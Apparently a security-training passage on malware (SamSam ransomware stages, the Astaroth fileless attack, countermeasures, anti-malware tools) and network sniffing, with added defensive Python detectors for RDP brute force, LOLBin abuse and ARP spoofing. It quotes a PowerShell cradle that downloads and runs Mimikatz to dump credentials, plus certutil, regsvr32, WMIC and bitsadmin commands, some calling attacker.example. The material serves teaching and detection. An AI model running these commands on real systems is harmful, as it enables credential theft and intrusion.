Nearly all ransomware uses spam emails to propagate and perform attacks; however, SamSam ransomware employs brute-force tactics against weak passwords of the Remote Desktop Protocol (RDP) to gain access to the victim's machine. Once the target host is infected, it performs network mapping to search for other exploitable assets in the network.
Encryption:
SamSam adopts the RSA-2048 asymmetric encryption technique to encrypt local files in infected systems.
Symptoms:
A ransom note appears on the screen, demanding a ransom in bitcoins.
Structure:
The SamSam ransomware mainly consists of the following components:
= Batch file: The batch file is responsible for executing the malware.
= Runner: The runner component tries to perform decryption, and the payload is then executed.
= Decryptor: It tries to decrypt the payload, which is placed in a separate DLL file. Then, the key will be generated from the password provided by the attackers.
SamSam Ransomware Attack Stages
SamSam ransomware attacks occur in three phases:
= Pre-Exploitation Phase
= Exploitation Phase
= Post-Exploitation Phase
Figure 7.104: Stages in SamSam Ransomware attack
Pre-Exploitation Phase
= Stage 1: Gains Access to Vulnerable Servers
In the initial stage of the pre-exploitation phase, the SamSam ransomware attackers check for the presence of unpatched RDP vulnerabilities in Internet-facing remote servers to gain an initial foothold in the victim's network.
= Stage 2: Harvests Admin Credentials
Since SamSam ransomware creators are capable and efficient in combining commodity and proprietary tools with publicly available exploits and techniques, once they identify vulnerable unpatched servers with the RDP protocol, they employ brute-force tools such as Mimikatz or NLBrute to harvest the admin credentials and perform privilege escalation. It has been found that the attackers mainly use PowerShell commands to call Mimikatz from an online PowerSploit repository.
powershell (New-Object Net.WebClient).DownloadString('https://raw.githubuse[…]imikatz.ps1');Invoke-Mimikatz -DumpCred
Figure 7.106: Screenshot displaying PowerShell command to download Mimikatz
= Stage 3: Spreads Infection
Once the attackers get admin access, they perform reconnaissance of the compromised network infrastructure using custom scripts or SystemTools' Hyena tool. They also create SOCKS proxies to tunnel the traffic and exploit legitimate admin tools such as PsExec, WMI, and RDP to spread and execute SamSam on the rest of the computers present in the network.
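To show how the RDP brute forcing described in the Propagation section and in Stages 1 and 2 looks from the defender's side, here is an added example (not from the courseware or Secureworks) that walks a constructed set of Windows Security logon events and flags a source that fails many RDP logons in a short window and then succeeds. The record layout, addresses, account names and thresholds are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Record layout (an assumption, modelled on Windows Security log fields):
# (timestamp ISO-8601, EventID, LogonType, IpAddress, TargetUserName)
# EventID 4625 = failed logon, 4624 = successful logon; LogonType 10 = RemoteInteractive (RDP).


def detect_rdp_bruteforce(events, threshold=20, window=timedelta(minutes=10)):
    """Flag source addresses with at least `threshold` failed RDP logons inside a
    sliding `window`, and mark them 'compromised' if a successful RDP logon from the
    same address follows. Returns {src_ip: {"failures", "accounts", "compromised"}}."""
    recent = defaultdict(deque)      # src_ip -> timestamps of recent RDP failures
    attempted = defaultdict(set)     # src_ip -> account names tried
    findings = {}
    for ts, event_id, logon_type, src, account in sorted(events, key=lambda e: e[0]):
        if logon_type != 10:         # only RDP logons matter for this rule
            continue
        t = datetime.fromisoformat(ts)
        if event_id == 4625:
            q = recent[src]
            q.append(t)
            attempted[src].add(account)
            while q and t - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(src, {"failures": 0, "accounts": set(),
                                              "compromised": False})
                f["failures"] = max(f["failures"], len(q))
                f["accounts"] |= attempted[src]
        elif event_id == 4624 and src in findings:
            # a success after a flagged burst: treat the account as compromised
            findings[src]["compromised"] = True
            findings[src]["accounts"].add(account)
    return findings


def constructed_events():
    """Constructed sample log, not a real capture: one address hammers RDP and then
    gets in, a second address makes a few failed attempts, a third fails over SMB."""
    base = datetime(2020, 3, 1, 2, 0, 0)
    ev = []
    for i in range(30):
        acct = "administrator" if i % 2 == 0 else "backup"
        ev.append(((base + timedelta(seconds=12 * i)).isoformat(), 4625, 10,
                   "203.0.113.45", acct))
    ev.append(((base + timedelta(minutes=7)).isoformat(), 4624, 10,
               "203.0.113.45", "administrator"))
    for i in range(3):
        ev.append(((base + timedelta(minutes=1, seconds=30 * i)).isoformat(), 4625, 10,
                   "198.51.100.7", "jsmith"))
    for i in range(25):   # LogonType 3 (network) failures are outside this rule's scope
        ev.append(((base + timedelta(seconds=5 * i)).isoformat(), 4625, 3,
                   "192.0.2.9", "svc"))
    return ev


SAMPLE_EVENTS = constructed_events()

if __name__ == "__main__":
    for src, f in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(src, f["failures"], "RDP failures against", sorted(f["accounts"]),
              "COMPROMISED" if f["compromised"] else "")
```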
Exploitation Phase
The exploitation phase is illustrated in the figure below:
Figure 7.107: Exploitation phase flow
= Stage 4: Deploys Payload
Figure 7.108: Batch Script Deploying SamSam payload (chareter2.exe)
This custom ransomware .NET binary file originally contained two embedded executables: del.exe or delfiletype.exe (Sysinternals SDelete program) and selfdel.exe (used to delete its malicious activity).
Figure 7.109: SamSam Ransomware Binary
= Stage 5: Executes Payload and Encrypts Local Files
After executing the binary file, the ransomware performs encryption of the target files matching a hard-coded list of approximately 300 file extensions. Before starting the encryption process, it categorizes the files by size (less than 250 MB, 500 MB, 1000 MB, and larger than 1000 MB) and encrypts the smallest files first. The malware also attempts to unlock files that are in use, presumably to ensure that active documents are encrypted, and cause maximum damage to the victim. Files are encrypted using the Windows Cryptography API with a symmetric-encryption algorithm (Rijndael) key that is randomly generated on the compromised system. The ransomware then encrypts the Rijndael key with an RSA-2048 public key, thereby providing adequate protection from the incident responders' recovery efforts.
Figure 7.110: Examples of hard-coded target file extensions
Post-Exploitation Phase
= Stage 6: Demands for Ransom
After encrypting the files of interest, the ransomware launches the Windows SDelete program to wipe the free space on the disk to hinder recovery efforts. The malware also deletes the main ransomware binary and the free space wiper. Then, it deploys another binary to delete all backup files from the local system and any network-accessible drives. When the encryption is complete, the ransomware displays an HTML extortion message (ransom note) on the victim's system, demanding a bitcoin amount for each affected system or a larger amount for all affected systems. The message also specifies a seven-day deadline for payment. The value of the ransom changes every year. The current value of the ransom that the SamSam ransomware is demanding is 3 bitcoins (approximately $41,700) for all systems.
The creators of SamSam ransomware use a WordPress website to coordinate ransomware payments with the victims. Once the victim pays the ransom, the threat actors provide a download link to a unique XML executable file and the corresponding RSA private key to decrypt the files.
(Figure: screenshot of the SamSam ransom payment website)
Sometimes, to avoid attention from law enforcement agencies, threat actors also coordinate ransom payments and communications via websites accessible only from the Tor network.
Fileless Malware Analysis: Astaroth Attack
= Step 2: Exploiting WMIC
Step 2.1: The BAT command executed in the previous step runs WMIC.exe as shown below:
Figure 7.114: Running WMIC.exe
In the above code, the /format parameter sent to WMIC.exe downloads the v.txt file, an XSL file hosted on a malicious domain. This file has an embedded JavaScript code that is automatically executed by WMIC.exe. Furthermore, the JavaScript code runs WMIC.exe once again.
Step 2.2: WMIC.exe is executed again as follows:
Figure 7.115: Running WMIC.exe
= Step 3: Exploiting Bitsadmin
The Bitsadmin tool is executed multiple times to download additional payloads as shown below:
Figure 7.116: Exploiting Bitsadmin
The downloaded payloads are encoded using Base64, and their filenames are as follows: falxconxrenwb.~, falxconxrenwxb.~, falxconxrenw64.~, falxconxrenw98.~, falxconxrenwxa.~, falxconxrenwgx.gif, and falxconxrenwg.gif
= Step 4: Exploiting Certutil
Attackers abuse the Certutil tool to decode the downloaded payloads as follows:
certutil.exe -decode %PUBLIC%\Libraries\temporary\falxconxrenwb.~ %PUBLIC%\Libraries\temporary\[…]
Only two files are decoded into the DLL format, while the others remain in the encoded and obfuscated format.
= Step 5: Exploiting Regsvr32
Now, attackers use the Regsvr32 tool to execute the decoded DLL files using the following command:
regsvr32 /s falxconxrenw64.~
falxconxrenw64.~ is a proxy DLL that loads and executes the second DLL file, falxconxrenw98.~. Furthermore, the second DLL initiates the execution of the third DLL retrieved from falxconxrenwxa.~ and falxconxrenwxb.~
= Step 6: Exploiting Userinit
The third DLL loaded and executed in the previous step reads and decodes falxconxrenwgx.gif into a DLL. This DLL is used to initiate the execution of userinit.exe and injects the decoded DLL. falxconxrenwgx.gif is a proxy DLL that retrieves, decodes, and loads the final DLL falxconxrenwg.gif, called the Astaroth, which is an information stealer.
Figure 7.118: Demonstration of Astaroth Attack
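As a defender's counterpart to Steps 2 to 6 above and to the PowerShell Mimikatz cradle in the SamSam pre-exploitation phase, the following added example (not from the courseware) scans constructed process-creation records for the LOLBin command-line patterns those steps rely on and flags a host where several of them fire together. Record fields, host names, PIDs and the attacker domain are assumptions; the payload file names are the ones the page lists.

```python
import re

# Rules: (name, process image, regex over the command line). The patterns mirror the
# Astaroth steps on this page (WMIC /format with a remote XSL, Bitsadmin downloads,
# Certutil -decode, Regsvr32 /s on a non-DLL extension) and the SamSam PowerShell
# cradle (DownloadString / Invoke-Mimikatz).
RULES = [
    ("wmic_remote_xsl", "wmic.exe",
     re.compile(r'/format\s*[:=]?\s*"?https?://', re.I)),
    ("bitsadmin_download", "bitsadmin.exe",
     re.compile(r"/transfer\b.*https?://", re.I)),
    ("certutil_decode", "certutil.exe",
     re.compile(r"-decode\b", re.I)),
    ("regsvr32_silent_oddext", "regsvr32.exe",
     re.compile(r"/s\b.*\.(?:~|gif|jpg|png|txt)(?=\s|$)", re.I)),
    ("powershell_download_cradle", "powershell.exe",
     re.compile(r"DownloadString\(|Invoke-Mimikatz", re.I)),
]

# Constructed process-creation records (not real telemetry). Host names, PIDs and the
# attacker domain are placeholders; the payload file names are the ones on this page.
SAMPLE_EVENTS = [
    {"host": "ws-17", "pid": 4012, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'WMIC.exe os get /format:"https://attacker.example/v.txt"'},
    {"host": "ws-17", "pid": 4020, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j1 /download https://attacker.example/falxconxrenwb.~ "
                r"C:\Users\Public\Libraries\temporary\falxconxrenwb.~"},
    {"host": "ws-17", "pid": 4031, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\Libraries\temporary\falxconxrenwb.~ "
                r"C:\Users\Public\Libraries\temporary\falxconxrenw64.~"},
    {"host": "ws-17", "pid": 4040, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s falxconxrenw64.~"},
    {"host": "srv-01", "pid": 880,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell (New-Object Net.WebClient).DownloadString("
                "'https://PLACEHOLDER/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCred"},
    # benign administrative uses of the same binaries on another host
    {"host": "ws-02", "pid": 1200, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\setup.msi SHA256"},
    {"host": "ws-02", "pid": 1210, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"},
    {"host": "ws-02", "pid": 1222, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption,version"},
]


def analyze(events):
    """Return {host: {"hits": [(rule, pid), ...], "chain": bool}}. "chain" is set when
    three or more distinct rules fire on one host: the download-decode-execute
    sequence of a fileless attack rather than a lone administrative use of a tool."""
    report = {}
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()   # basename of the image path
        for name, proc, pattern in RULES:
            if image == proc and pattern.search(ev["cmdline"]):
                entry = report.setdefault(ev["host"], {"hits": [], "chain": False})
                entry["hits"].append((name, ev["pid"]))
    for entry in report.values():
        entry["chain"] = len({name for name, _ in entry["hits"]}) >= 3
    return report


if __name__ == "__main__":
    for host, entry in analyze(SAMPLE_EVENTS).items():
        print(host, "CHAIN" if entry["chain"] else "single hit", entry["hits"])
```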
Module Flow
Malware is commonly used by attackers to compromise target systems. Preventing malware from entering a system is far easier than trying to eliminate it from an infected system. This section presents various countermeasures that prevent malware from entering a system and minimize the risk caused by it upon its entry.
Trojan Countermeasures
Some countermeasures against Trojans are as follows:
= Avoid opening email attachments received from unknown senders
= Block all unnecessary ports at the host and use a host firewall
= Avoid accepting programs transferred by instant messaging
= Harden weak default configuration settings and disable unused functionality, including protocols and services
= Monitor the internal network traffic for odd ports or encrypted traffic
= Avoid downloading and executing applications from untrusted sources
= Install patches and security updates for the OS and applications
= Scan external USB drives and DVDs with antivirus software before using them
= Restrict permissions within the desktop environment to prevent installation of malicious applications
= Avoid typing commands blindly and implementing pre-fabricated programs or scripts
= Manage local workstation file integrity through checksums, auditing, and port scanning
= Run host-based antivirus, firewall, and intrusion detection software
Backdoor Countermeasures
Some common countermeasures against backdoors are as follows:
= Most commercial antivirus products can automatically scan and detect backdoor programs before they can cause damage
= Educate users to avoid installing applications downloaded from untrusted Internet sites and email attachments
= Avoid untrusted software and ensure that a firewall protects every device
= Use antivirus tools such as McAfee and Norton to detect and eliminate backdoors
= Track open-source projects that enter the enterprise from untrusted external sources such as open-source code repositories
= Inspect network packets using protocol monitoring tools
= If a computer is found to be infected by backdoors, restart the infected computer in the safe mode with networking
= Run registry monitoring tools to find malicious registry entries added by the backdoor
= Remove or uninstall the program or application installed by the backdoor Trojan or virus
= Remove the malicious registry entries added by the backdoor Trojan
= Delete malicious files related to the backdoor Trojan
Virus and Worm Countermeasures
Some countermeasures against viruses and worms are as follows:
= Install antivirus software that detects and removes infections as they appear
= Generate an antivirus policy for safe computing and distribute it to the staff
= Pay attention to the instructions while downloading files or programs from the Internet
= Regularly update antivirus software
= Avoid opening attachments received from unknown senders, as viruses spread via e-mail attachments
= Since virus infections can corrupt data, ensure that you perform regular data backups
= Schedule regular scans for all drives after the installation of antivirus software
= Do not accept disks or programs without checking them first using a current version of an antivirus program
= Ensure that any executable code used within the organization has been approved
= Do not boot the machine with an infected bootable system disk
= Stay informed about the latest virus threats
= Check DVDs for virus infection
= Ensure that pop-up blockers are turned on and use an Internet firewall
= Perform disk clean-up and run a registry scanner once a week
= Run anti-spyware or anti-adware once a week
= Do not open files with more than one file-type extension
= Be cautious with files sent through instant messenger applications
Fileless Malware Countermeasures
Some countermeasures against fileless malware are as follows:
= Train employees to detect phishing emails and to never enable macros in MS Office documents
= Disable PDF readers to run JavaScript automatically
= Disable Flash in the browser settings
= Implement two-factor authentication to access critical systems or resources connected to the network
= Implement multi-layer security to detect and defend against memory-resident malware
= Use User Behavior Analytics (UBA) solutions to detect threats hidden within your data
= Ensure the ability to detect system tools such as PowerShell and WMIC, and whitelisted application scripts against malicious attacks
= Run periodic antivirus scans to detect infections and keep the antivirus program updated
= Install browser protection tools and disable automatic plugin downloads
= Schedule regular security checks for applications and regularly patch the applications
= Regularly update the OS with the latest security patches
= Examine all the running programs for any malicious or new signatures and heuristics
= Enable endpoint security with active monitoring to protect networks when accessed remotely
= Examine the indicators of compromise on the system and the network
= Regularly check the security logs, especially when excessive amounts of data leave the network
= Restrict admin rights and provide the least privileges to the user level to prevent privilege escalation attacks
= Use application control to prevent Internet browsers from spawning script interpreters such as PowerShell and WMIC
= Carefully examine the changes in the system's usual behavior patterns compared with the baselines
= Use next-generation antivirus (NGAV) software that employs advanced technology such as ML (machine learning) and AI (artificial intelligence) to avoid new polymorphic malware
= Use baselines and search for known tactics, techniques, and procedures (TTPs) used by many adversarial groups
= Ensure that you use Managed Detection and Response (MDR) services that can perform threat hunting
= Ensure that you use tools such as Blackberry Cylance and Microsoft Enhanced Mitigation Experience Toolkit to combat fileless attacks
= Disable unused or unnecessary applications and service features
= Uninstall applications that are not important
= Block all the incoming network traffic or files with the .exe format
Module Flow
Anti-Malware Software
An attacker uses malware to commit online fraud or theft. Thus, the use of anti-malware software is recommended to help detect malware, remove it, and repair any damage it might cause. This section lists and describes various anti-malware (anti-Trojan and antivirus) software programs.
Anti-Trojan Software
Anti-Trojan software is a tool or program that is designed to identify and prevent malicious Trojans or malware from infecting computer systems or electronic devices. Anti-Trojan tools may employ scanning strategies as well as freeware or licensed tools to detect Trojans, backdoors, rootkits, and other types of potentially damaging software.
= Kaspersky Internet Security
Source: https://www.kaspersky.com
Kaspersky Internet Security protects devices from various types of intrusions due to Trojans, viruses, spyware, ransomware, phishing, and dangerous websites. It securely stores passwords for easy access on PC, Mac, and mobile. It makes backup copies of photos, music, and files and also encrypts data on PC. Furthermore, it automatically blocks inappropriate content and helps you manage the use of social networks. In addition, it provides extra security when you shop or bank online on PC or Mac.
Figure 7.119: Screenshot of Kaspersky Internet Security
Some additional anti-Trojan software are as follows:
= McAfee® LiveSafe™ (https://www.mcafee.com)
= Symantec Norton Security Premium (https://www.symantec-norton.com)
= Bitdefender Total Security (https://bitdefender.com)
= HitmanPro (https://www.hitmanpro.com)
= Malwarebytes (https://www.malwarebytes.org)
= Zemana Antimalware (https://www.zemana.com)
= Emsisoft Anti-Malware Home (https://www.emsisoft.com)
= Malicious Software Removal Tool (https://www.microsoft.com)
= SUPERAntiSpyware (https://www.superantispyware.com)
= Plumbytes Anti-Malware (https://plumbytes.com)
Antivirus Software
It is essential to update antivirus tools to monitor the data passing through a system. Such tools may follow specific or generic methods to detect viruses. Generic methods look for virus-like performance rather than a specific virus. These tools do not specify the virus type but warn the user of a possible virus infection. Generic methods can raise false alarms; hence, they do not perform well in terms of detecting precise virus forms. Specific methods look for known virus signatures in the antivirus database and ask the user to choose the necessary action to be taken, such as repair and delete. It is a good practice for organizations to install the most recent version of the antivirus software and regularly update it to keep up with the introduction of new viruses in the market. Updating of antivirus software by the respective vendors is a continuous process.
= Bitdefender Antivirus Plus 2019
Source: https://www.bitdefender.com
Bitdefender Antivirus Plus 2019 works against all threats, from viruses, worms, and Trojans to ransomware, zero-day exploits, rootkits, and spyware. It uses a technique called behavioral detection to closely monitor active apps. As soon as it detects suspicious activity, it takes decisive action to prevent infection. It sniffs and blocks malicious websites that masquerade as trustworthy websites to steal financial data such as passwords or credit card numbers.
Figure 7.120: Screenshot of Bitdefender Antivirus Plus 2019
Some additional antivirus software are as follows:
= ClamWin (http://www.clamwin.com)
= Kaspersky Anti-Virus (https://www.kaspersky.com)
= McAfee AntiVirus Plus (https://home.mcafee.com)
= Norton AntiVirus Basic (https://www.norton.com)
= Avast Premier Antivirus (https://www.avast.com)
= ESET Internet Security (https://www.eset.com)
= AVG Antivirus FREE (https://free.avg.com)
= Avira Antivirus Pro (https://www.avira.com)
= Trend Micro Maximum Security (https://trendmicro.com)
= Panda Antivirus Pro (https://www.pandasecurity.com)
= Webroot SecureAnywhere Antivirus (https://www.webroot.com)
Fileless Malware Detection Tools
Figure 7.121: Screenshot of AlienVault® USM Anywhere™
Some additional tools for detecting fileless malware threats are as follows:
= Quick Heal Total Security (http://www.quickheal.com)
= Endpoint Detection and Response (EDR) (https://www.trendmicro.com)
= DefenderCheck (https://github.com)
= FCL (https://github.com)
= CYNET 360 (https://www.cynet.com)
Fileless Malware Protection Tools
Figure 7.122: Screenshot of McAfee Endpoint Security
Some additional fileless malware protection tools are as follows:
= Microsoft Defender Advanced Threat Protection (https://docs.microsoft.com)
= Kaspersky Endpoint Security for Business (https://www.kaspersky.com)
= Trend Micro Smart Protection Suites (https://www.trendmicro.com)
= Norton 360 with LifeLock Select (https://us.norton.com)
= REVE Antivirus (https://www.reveantivirus.com)
Module Summary
This module presented the concepts of malware and their propagation techniques. It also discussed the concepts of APT and its lifecycle. Furthermore, it described the concepts of Trojans, their types, and how they infect systems. In addition, it described the concepts of viruses, their types, and how they infect files as well as the concepts of computer worms. Moreover, it explained the concepts of fileless malware and how they infect files. It also illustrated how to perform static and dynamic malware analysis and described various techniques to detect malware. Furthermore, it presented various measures against Trojans, backdoors, viruses, and worms. Finally, it ended with a detailed discussion on various anti-Trojan and antivirus tools.
In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers use sniffing to collect information about a target of evaluation.
Module 08: Sniffing
Module Objectives
This module starts with an overview of sniffing concepts and provides an insight into MAC, DHCP, ARP, MAC spoofing, and DNS poisoning attacks. Later, the module discusses various sniffing tools, countermeasures, and detection techniques.
At the end of this module, you will be able to:
= Describe sniffing concepts
= Explain different MAC attacks
= Explain different DHCP attacks
= Describe ARP poisoning
= Explain different spoofing attacks
= Describe DNS poisoning
= Apply a defense mechanism against various sniffing techniques
= Use different sniffing tools
= Apply various sniffing countermeasures
= Apply various techniques to detect sniffing attacks
Module Flow
Sniffing Concepts
This section describes network sniffing and threats, how a sniffer works, active and passive sniffing, how an attacker hacks a network using sniffers, protocols vulnerable to sniffing, sniffing in the data link layer of the Open Systems Interconnection (OSI) model, hardware protocol analyzers, Switched Port Analyzer (SPAN) ports, wiretapping, and lawful interception.
Network Sniffing
Packet sniffing is the process of monitoring and capturing all data packets passing through a given network using a software application or hardware device. Sniffing is straightforward in hub-based networks, as the traffic on a segment passes through all the hosts associated with that segment. However, most networks today work on switches. A switch is an advanced computer networking device. The major difference between a hub and a switch is that a hub transmits line data to each port on the machine and has no line mapping, whereas a switch looks at the Media Access Control (MAC) address associated with each frame passing through it and sends the data to the required port. A MAC address is a hardware address that uniquely identifies each node of a network.
An attacker needs to manipulate the functionality of the switch to see all the traffic passing through it. A packet sniffing program (also known as a sniffer) can capture data packets only from within a given subnet, which means that it cannot sniff packets from another network. Often, any laptop can plug into a network and gain access to it. Many enterprises' switch ports are open. A packet sniffer placed on a network in promiscuous mode can therefore capture and analyze all the network traffic. Sniffing programs turn off the filter employed by Ethernet network interface cards (NICs) to prevent the host machine from seeing other stations' traffic. Thus, sniffing programs can monitor all traffic.
Although most networks today employ switch technology, packet sniffing is still useful. This is because installing remote sniffing programs on network components with heavy traffic flows such as servers and routers is relatively easy. It allows an attacker to observe and access the entire network traffic from one point. Packet sniffers can capture data packets containing sensitive information such as passwords, account information, syslog traffic, router configuration, DNS traffic, email traffic, web traffic, chat sessions, and FTP passwords. This
allows an attacker to read passwords in cleartext, the actual emails, credit card numbers, financial transactions, etc. It also allows an attacker to sniff SMTP, POP, IMAP traffic, HTTP Basic, telnet authentication, SQL database, SMB, NFS, and FTP traffic. An attacker can gain a substantial amount of information by reading captured data packets; then, the attacker can use that information to break into the network. An attacker carries out more effective attacks by combining these techniques with active transmission.
The following diagram depicts an attacker sniffing the data packets between two legitimate network users:
Figure 8.1: Packet sniffing scenario
How a Sniffer Works
The most common way of networking computers is through an Ethernet connection. A computer connected to a local area network (LAN) has two addresses: a MAC address and an Internet Protocol (IP) address. A MAC address uniquely identifies each node in a network and is stored on the NIC itself. The Ethernet protocol uses the MAC address to transfer data to and from a system while building data frames. The data link layer of the OSI model uses an Ethernet header with the MAC address of the destination machine instead of the IP address. The network layer is responsible for mapping IP network addresses to the MAC address as required by the data link protocol. It initially looks for the MAC address of the destination machine in a table, usually called the Address Resolution Protocol (ARP) cache. If there is no entry for the IP address, an ARP broadcast of a request packet goes out to all machines on the local sub-network. The machine with that particular address responds to the source machine with its MAC address. The source machine's ARP cache adds this MAC address to the table. The source machine then uses this MAC address in all its communications with the destination machine.
There are two basic types of Ethernet environments, and sniffers work differently in each. These two types are:
= Shared Ethernet
In a shared Ethernet environment, a single bus connects all the hosts that compete for bandwidth. In this environment, all the other machines receive packets meant for one machine. Thus, when machine 1 wants to talk to machine 2, it sends a packet out on the
network with the destination MAC address of machine 2, along with its own source MAC address. The other machines in the shared Ethernet (machines 3 and 4) compare the frame's destination MAC address with their own and discard the unmatched frame. However, a machine running a sniffer ignores this rule and accepts all the frames. Sniffing in a shared Ethernet environment is passive and, hence, difficult to detect.
= Switched Ethernet
In a switched Ethernet environment, the hosts connect with a switch instead of a hub. The switch maintains a table that tracks each computer's MAC address and the physical port on which that MAC address is connected, and then delivers packets destined for a particular machine. The switch is a device that sends packets to the destined computer only; furthermore, it does not broadcast them to all the computers on the network. This results in better utilization of the available bandwidth and improved security. Hence, the process of putting a machine NIC into promiscuous mode to gather packets does not work. As a result, many people think that switched networks are secure and immune to sniffing. However, this is not true.
Although a switch is more secure than a hub, sniffing the network is possible using the following methods:
= ARP Spoofing
ARP is stateless. A machine can send an ARP reply even without asking for it; furthermore, it can accept such a reply. When a machine wants to sniff the traffic originating from another system, it can ARP spoof the gateway of the network. The ARP cache of the target machine will have an incorrect entry for the gateway. Thus, all the traffic destined to pass through the gateway will now pass through the machine that spoofed the gateway MAC address.
= MAC Flooding
Switches maintain a translation table that maps various MAC addresses to the physical ports on the switch. As a result, they can intelligently route packets from one host to another. However, switches have a limited memory. MAC flooding makes use of this limitation to bombard switches with fake MAC addresses until the switches can no longer keep up. Once this happens to a switch, it will enter fail-open mode, wherein it starts acting as a hub by broadcasting packets to all the ports on the switch. Once that happens, it becomes easy to perform sniffing. macof is a utility that comes with the dsniff suite and helps the attacker to perform MAC flooding.
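An added example (not part of the courseware) showing how the two switched-network methods just described can be spotted from a monitoring point: it walks constructed frames, alerting when an ARP reply rebinds a known IP (here the gateway) to a new MAC and when one switch port sources an implausible number of distinct MACs. The frame layout, addresses and the 50-MAC limit are assumptions.

```python
from collections import defaultdict

GATEWAY_IP = "10.0.0.1"   # assumed gateway of the monitored segment


def analyze_frames(frames, mac_limit=50):
    """frames: (port, src_mac, kind, ip) tuples in arrival order, where kind is
    "arp-reply" (ip = the address the sender claims) or "data" (ip unused).
    Returns alerts: an ARP reply that rebinds a known IP to a different MAC, and a
    port whose distinct source MACs exceed mac_limit (a macof-style flood)."""
    ip_to_mac = {}                    # first MAC seen claiming each IP
    macs_per_port = defaultdict(set)  # distinct source MACs per ingress port
    alerts = []
    for port, src_mac, kind, ip in frames:
        seen = macs_per_port[port]
        seen.add(src_mac)
        if len(seen) == mac_limit + 1:   # report once, as the limit is crossed
            alerts.append({"type": "mac_flooding", "port": port,
                           "distinct_macs": len(seen)})
        if kind == "arp-reply":
            known = ip_to_mac.setdefault(ip, src_mac)
            if known != src_mac:
                alerts.append({"type": "arp_spoof", "ip": 
                               ip, "old_mac": known, "new_mac": src_mac,
                               "port": port, "gateway": ip == GATEWAY_IP})
    return alerts


def constructed_frames():
    """Constructed capture, not real traffic: normal ARP replies from the gateway and
    a host, then a third port that first claims the gateway's IP and then floods."""
    frames = [(1, "00:11:22:33:44:01", "arp-reply", GATEWAY_IP),
              (2, "00:11:22:33:44:20", "arp-reply", "10.0.0.20"),
              (1, "00:11:22:33:44:01", "arp-reply", GATEWAY_IP),
              (7, "de:ad:be:ef:00:07", "arp-reply", GATEWAY_IP)]
    for i in range(60):   # forged, distinct source MACs all arriving on port 7
        frames.append((7, f"02:00:00:00:{i // 256:02x}:{i % 256:02x}", "data", None))
    return frames


SAMPLE_FRAMES = constructed_frames()

if __name__ == "__main__":
    for alert in analyze_frames(SAMPLE_FRAMES):
        print(alert)
```

On a real switch the per-port count would come from the CAM table or port-security counters; with a SPAN capture the ingress port is often unavailable and the MAC count must be taken per segment instead.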
Once a switch turns into a hub, it starts broadcasting all packets it receives to all the computers in the network. By default, promiscuous mode is turned off in network machines; therefore, the NICs accept only those packets that are addressed to a user's machine and discard the packets sent to the other machines. A sniffer turns the NIC of a system to promiscuous mode so that it listens to all the data transmitted on its segment. A sniffer can constantly monitor all the network traffic to a computer through the NIC by decoding information encapsulated in the data packets. Attackers configure the NIC in their machines to run in promiscuous mode so that the card starts accepting all the packets. Thus, the attacker can view all the packets that are being transmitted in the network.
Figure 8.2: Working of a sniffer (attacker PC running a NIC card in promiscuous mode; the attacker forces the switch to behave as a hub)
Types of Sniffing
Attackers run sniffers to convert the host system's NIC to promiscuous mode. As discussed earlier, the NIC in promiscuous mode can then capture packets addressed to the specific network. There are two types of sniffing. Each is used for different types of networks. The two types are:

• Passive sniffing
• Active sniffing

Passive Sniffing

Passive sniffing involves sending no packets. It simply captures and monitors the packets flowing in the network. A packet sniffer alone is not preferred for an attack because it works only in a common collision domain. A common collision domain is the sector of the network that is not switched or bridged (i.e., connected through a hub). Common collision domains are present in hub environments. A network that uses hubs to connect systems uses passive sniffing. In such networks, all hosts in the network can see all the traffic. Hence, it is easy to capture traffic through the hub using passive sniffing.
Figure 8.3: Passive sniffing (attacker connected to a hub)
Attackers use the following passive sniffing methods to gain control over a target network:

• Compromising physical security: An attacker who succeeds in compromising the physical security of a target organization can walk into the organization with a laptop and try to plug into the network and capture sensitive information about the organization.

• Using a Trojan horse: Most Trojans have in-built sniffing capability. An attacker can install these on a victim's machine to compromise it. After compromising the victim's machine, the attacker can install a packet sniffer and perform sniffing.

Most modern networks use switches instead of hubs. A switch eliminates the risk of passive sniffing. However, a switch is still vulnerable to active sniffing.

Note: Passive sniffing provides significant stealth advantages over active sniffing.
Active Sniffing

Active sniffing searches for traffic on a switched LAN by actively injecting traffic into it. Active sniffing also refers to sniffing through a switch. In active sniffing, the switched Ethernet does not transmit information to all the systems connected through the LAN as it does in a hub-based network. For this reason, a passive sniffer is unable to sniff data on a switched network. It is easy to detect these sniffer programs and highly difficult to perform this type of sniffing.

Switches examine data packets for source and destination addresses and then transmit them to the appropriate destinations. Therefore, it is cumbersome to sniff switches. However, attackers can actively inject ARP traffic into a LAN to sniff around a switched network and capture the traffic. Switches maintain their own ARP cache in Content Addressable Memory (CAM). CAM is a special type of memory that maintains a record of which host is connected to which port. A sniffer records all the information visible on the network for future review. An attacker can see all the information in the packets, including data that should remain hidden.

To summarize the types of sniffing: passive sniffing does not send any packets; it only monitors the packets sent by others. Active sniffing involves sending out multiple network probes to identify access points.

The following is a list of different active sniffing techniques:

• MAC flooding
• DNS poisoning
• ARP poisoning
• DHCP attacks
• Switch port stealing
• Spoofing attack
Figure 8.4: Discovering a switch to access the network
Step 3: By analyzing the network topology, the attacker identifies the victim's machine to target his/her attacks.

Figure 8.6: Identifying the victim's machine

Step 4: An attacker who identifies a target machine uses ARP spoofing techniques to send fake (spoofed) Address Resolution Protocol (ARP) messages.

Figure 8.7: Attacker sending fake ARP message

Step 5: The previous step helps the attacker to divert all the traffic from the victim's computer to the attacker's computer. This is a typical man-in-the-middle (MITM) type of attack.

